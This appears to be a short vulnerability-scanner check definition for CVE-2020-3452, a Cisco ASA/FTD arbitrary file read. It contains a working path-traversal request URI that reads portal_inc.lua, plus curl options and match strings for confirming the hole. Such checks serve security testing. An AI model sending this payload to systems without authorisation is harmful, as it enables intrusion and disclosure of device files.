AUTHOR='@xer0dayz' VULN_NAME='CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability' URI='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../' METHOD='GET' MATCH="INTERNAL_PASSWORD_ENABLED|CONF_VIRTUAL_KEYBOARD" SEVERITY='P1 - CRITICAL' CURL_OPTS="--user-agent '' -s -L --insecure" SECONDARY_COMMANDS='' GREP_OPTIONS='-i'